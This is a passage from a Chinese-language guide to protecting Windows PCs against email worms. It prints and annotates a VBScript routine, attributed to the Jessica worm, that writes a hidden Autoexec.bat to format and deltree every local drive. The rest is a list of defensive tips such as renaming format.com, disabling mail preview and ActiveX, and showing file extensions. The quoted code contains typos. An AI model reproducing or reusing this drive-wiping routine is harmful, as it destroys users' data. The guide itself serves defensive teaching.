4.防止病毒發作后搞“破壞”
蠕蟲病毒的破壞性大家都有所了解吧?我們以著名的蠕蟲病毒Jessica Worm中的部分破壞代碼為例來加以分析說明:
sub killc() ‘這是子程序,破壞硬盤的過程。
On Error Resume Next‘容錯語句,避免程序崩潰。
dim fs,auto,disc,ds,ss,i,x,dir
Set fs=CreateObjec(“Scipting.FileSystemObject”)
Set auto=fs.CreateTextFile(“c:Autoexec.bat”,True)‘建立或修改自動批處理。
auto.WriteLine(“@echo off”)‘屏蔽掉刪除的進程。
auto.WriteLine(“Smartdrv”)‘加載磁盤緩沖。
Set disc=fs.Drives‘得到驅動器的集合。
For Each ds in disc
If ds.DriveType=2 Then‘如果驅動器是本地盤。
ss=ss&ds.DriveLetter‘就將符號連在一起。
End if
Next
ss=LCase(StrReverse(Trim(ss)))‘得到符號串的反向小寫形式。
For i=to Len(ss)‘遍歷每個驅動器。
x=Mid(ss,i,1) ‘讀每個驅動器的符號。
auto.WriteLine(“format/autotest/q/u‘&x&’:”) ‘反向(從Z:到A:)自動格式化驅動器。
Next
Fori=1 to Len(ss)
x=Mid(ss,i,1)
auto.WriteLine(“deltree/y ‘&x&’:”) ‘怕Format失效用Deltree雙保險
Next
auto.Close‘關閉批處理文件。
set dir=fs.GetFile(“c:Autoexec.bat”)
dir.attributes=dir.atlributes+2 ’將自動批處理文件改為隱藏。
End sub
如果以前沒有親身體驗到蠕蟲病毒的厲害,那么從這個小例子中,應該知道蠕蟲病毒的厲害了吧?
電子郵件型病毒不可能像傳統病毒一樣調用匯編程序來實現破壞功能。它只能通過調用已經編譯好的帶有破壞性的程序來實現這一功能。那么我們就把本地的帶有破壞性的程序改名字,例如把format.com改成fmt.com,那樣病毒的編輯者就無法實現用調用本地命令來實現這一功能。僅僅如此還不足以真正地防范電子郵件型病毒,我們還要把上面所說的方法結合起來才可有效防范電子郵件型病毒。另外,還需結合下面的方法才能更好地防范電子郵件型病毒。
5.通用規則
(1)在收發郵件時打開防火墻和殺毒軟件來防殺郵件病毒,這一條沒有什么好說的,應該是共識了。
(2)不要輕易暴露自己的信箱地址,注意自己的網上言語,盡量不要得罪人,免得人家攻擊。
(3)發現郵箱中出現不明來源的郵件應小心謹慎對待,遇到帶可執行文件(*.EXE,*.COM)或帶有宏功能的附件(*.DOC等),不要選打開,最好先選擇為“另存為”到磁盤上,用殺毒軟件先查殺。
(4)除非必要,盡量關閉郵件“預覽”特性。很多嵌入在HTML格式郵件中的病毒代碼會在預覽的時候執行,我們經常從媒體看到這樣一種恐怖說法:“用戶只要收到這些帶病毒的郵件,即使不打開,病毒也能發作”,其實就是病毒代碼在郵件預覽的時候執行的。
(5)設定郵件的路徑在C盤以外,因為C分區是病毒攻擊頻率最高的地方,萬一受到防火墻不能過濾的新型病毒攻擊成功,受到的損失也可減少。
(6)收到新郵件盡量使用“另存為”選項為郵件做備份(注意分類儲存,不要在同一根目錄下放全部的郵件)此時還可以為郵件起一個更一目了然的名字,既是備份,又方便管理查閱,一舉兩得。
(7)對于利用文件的擴展名做文章的病毒,不要隱藏系統中已知文件類型的擴展名稱。 Windows操作系統默認的是“隱藏已知文件類型的擴展名稱”。顯示所有文件類型的擴展名稱的方法是(以Windows98系統為例):選擇“控制面板”→“查看”→“文件夾選項”→“查看”→“文件和文件夾”,其中有一項目是“隱含已知文件類型的擴展名”,不選擇該項目即可。當然Windows系統下對于一些特別的文件的擴展名,比如“垃圾蟲ScrapWorm”利用的是“SHS”擴展名稱有特殊的設置,具有該擴展名稱的文件,即使用戶使用了以上的方法還是不能顯示出其擴展名稱。解決的方法是:在注冊表編輯器HEY_CLASSES_ROOTShellScrap鍵下,有一個鍵值“NeverShowExt”,它是導致“.SHS”文件擴展名無法顯示的罪魁禍首。刪除這個鍵值,就可以看到“.SHS”擴展名了。
(8)將系統的網絡連接的安全級別設置至少為“中等”,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。點擊“控制面板”中的“Intemet”項目中的“安全”標簽,會出現“Intemet”項的安全級別設置窗口,將其至少設置成“中等”級別。單擊菜單欄里“Intemet選項”安全選項卡里的自定義級別按鈕,把“ActiveX控件及插件”的一切設為禁用,這樣就不怕蠕蟲病毒了。
(9)如果可能,盡量不要使用Outlook Express收發郵件,可以使用FoxMail等電子郵件客戶端來代替它;另外,要注意為瀏覽器打上最新的補丁;對于通過腳本工作的病毒,可以采用在瀏覽器中禁止Java或ActiveX運行的方法來阻止病毒的發作。
(10)盡量不要在“通訊簿”中設置太多的名單,如果要發送新郵件,可以進入郵件的存儲目錄,打開客戶發來的郵件,利用“回復”功能來發送新郵件(刪除原有內容即可)如果客戶或朋友較多,利用回復不方便,可以新建一個文本文件(自己做好備份,記得路徑及名稱),把客戶的郵件地址一一列入其中,要發新郵件的時候,利用“CTRL”+“C”,“CTRL”+“V”快捷鍵把客戶郵件地址粘貼到“收件人”欄中去。這樣雖然麻煩一點,但是有效地防止了郵件病毒的進一步傳播,須知現在的郵件病毒變種既多更新又快,防殺難免有漏洞,病毒一發作,就自動復制無數復本發送到“通訊簿”里所有的用戶。用此法可以避免病毒的擴散,特別是有商業關系的客戶不會因此受到牽連,發生誤會從而影響合作關系。此法還可起到保密客戶的作用,因為名單文本的目錄和名稱只有本機主人才知道。
通過以上的層層設防,用戶的系統應該能防御絕大多數的郵件型病毒了。